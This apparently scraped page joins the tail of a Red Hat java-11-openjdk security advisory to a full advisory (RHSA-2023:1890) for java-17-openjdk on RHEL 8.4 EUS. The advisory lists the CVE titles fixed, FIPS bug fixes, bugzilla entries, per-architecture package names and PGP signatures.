java-11-openjdk-11.0.19.0.7-1.el8_6.src.rpm

aarch64:  
java-11-openjdk-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_6.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_6.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_6.s390x.rpm

x86_64:  
java-11-openjdk-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_6.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_6.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_6.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_6.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_6.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_6.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsC9zjgjWX9erEAQgYCw/+OLvg4nhNOi1tNfZfpsb05In1DnJiwHmD  
uvQsXYG4Kqj8Juzk5ZtfYO5aaCvCbLjchvGSl+dVsI7UjCjlVgWWxK1FSoPPkUMg  
f76zjBiB2Xae0E9M1h7DQ2fovqrZPbqonY3ObCi0Eo3DF3EnTDc7XlKPPoIhPpXp  
VgxNtQv0FOtDrhujZR7v4zyymWp8zoD+n03Td5/x2ohsfm810f/ii5opCZHk7G0y  
k5DXWXnH8gQPiH+iNPQEcS2C9GKu05+PQrrORSZ+oFSaVjQmIpcRm5ZOm17AcbEq  
TZg8MWPSjhAy9UN51T6dYk0rbrZBcn1PR9uq3WMYFOzKJy4dpBdawtjtUSjhSZVX  
Vf6DYtSFN345QDdpUbMsDQN96k2x4r3xoVc7WEMP/A5jg8A7yUMcTFZYXpjms0e/  
R91cpzLotfw12Am1oq1ZRM4HeSZKLNLaE06OsCJbZ+38SHpBbiXfGk0rl8fNhMrH  
7+c7BfRe62MNDq0MnXkiKWGw9ErXLG5Sk/rEahZe+79AkPvONEP6GkoWgbmSkYjl  
JHHirKZHv0AxKvOcejirPzU+a2dS9oHv+/3YqKv6t8mM1kVN/SpAeiiKjuR6YQtF  
4Rc79JUQZlPDcW2jnMoI7BVw5OQOQj+TC9efQ8zfvaR38B70s388anOaa7F/zDd7  
61JRkkyJlzU=  
=IoUp  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1892-01

Red Hat Security Advisory 2023-1890-01 - The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-17-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:1890-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1890  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-17-openjdk is now available for Red Hat Enterprise Linux  
8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v. 8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-17-openjdk packages provide the OpenJDK 17 Java Runtime  
Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* In FIPS mode, the list of cryptographic services and algorithms available  
is limited to those that are FIPS compliant. It was found that this  
filtering was too strict and was also excluding service attributes. These  
attributes are now made available in FIPS mode, as they are in non-FIPS  
mode. (RHBZ#2186837)

* Previously, the XML signature provider was unable to operate in FIPS  
mode. Following recent enhancements to FIPS mode support, the XML signature  
provider can now be supported. It is now enabled in FIPS mode.  
(RHBZ#2186829)

* The PKCS#11 provider used by FIPS mode can be supported by different  
PKCS#11 tokens. It was found that some PKCS#11 tokens may not be  
initialised fully before use, leading to an exception being thrown by the  
provider. With this release, this exception is now expected and handled by  
the FIPS support code. (RHBZ#2186833)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2186829 - Enable XML Signature provider in FIPS mode [rhel-8, openjdk-17] [rhel-8.4.0.z]  
2186833 - C_GetInfo can throw an exception if called before initialization in some PKCS #11 tokens [rhel-8, openjdk-17] [rhel-8.4.0.z]  
2186837 - Add missing attributes when registering services in FIPS mode [rhel-8, openjdk-17] [rhel-8.4.0.z]  
2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
java-17-openjdk-17.0.7.0.7-1.el8_4.src.rpm

aarch64:  
java-17-openjdk-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_4.aarch64.rpm

ppc64le:  
java-17-openjdk-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_4.ppc64le.rpm

s390x:  
java-17-openjdk-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_4.s390x.rpm

x86_64:  
java-17-openjdk-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_4.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v. 8.4):

aarch64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_4.aarch64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_4.aarch64.rpm

ppc64le:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_4.ppc64le.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_4.ppc64le.rpm

s390x:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_4.s390x.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_4.s390x.rpm

x86_64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_4.x86_64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsCdzjgjWX9erEAQjUJA//WNEnSTqIrkI7ButYT3l5c6sAdq9j1oM6  
